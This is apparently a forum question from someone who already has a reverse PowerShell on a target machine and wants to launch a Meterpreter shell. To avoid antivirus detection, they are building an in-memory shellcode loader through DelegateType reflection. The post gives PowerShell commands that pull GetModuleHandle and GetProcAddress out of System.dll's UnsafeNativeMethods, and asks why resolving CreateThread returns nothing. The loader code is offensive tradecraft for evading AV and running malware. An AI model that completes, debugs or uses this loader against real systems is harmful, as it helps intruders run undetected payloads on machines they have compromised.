I got a reverse powershell on the machine. I try to execute a meterpreter shell. To bypass the AV, I try to load my meterpreter shellcode thanks to DelegateType Reflection technique in order to write the malicious code only in memory. I execute the following powershell commands sucessfully: $systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(‘\’)[-1].Equals(‘System.dll’) }) $unsafeObj = $systemdll.GetType(‘Microsoft.Win32.UnsafeNativeMethods’) $GetModuleHandle = $unsafeObj.GetMethod(‘GetModuleHandle’) $GetProcAddress = $unsafeObj.GetMethod(‘GetProcAddress’) $kernel32 = $GetModuleHandle.Invoke($null, @(“kernel32.dll”)) Always is fine at this point but when I try to execute the following command: $GetProcAddress.Invoke($null, @($kernel32, “CreateThread”)) It returns nothing! And I don’t understand why!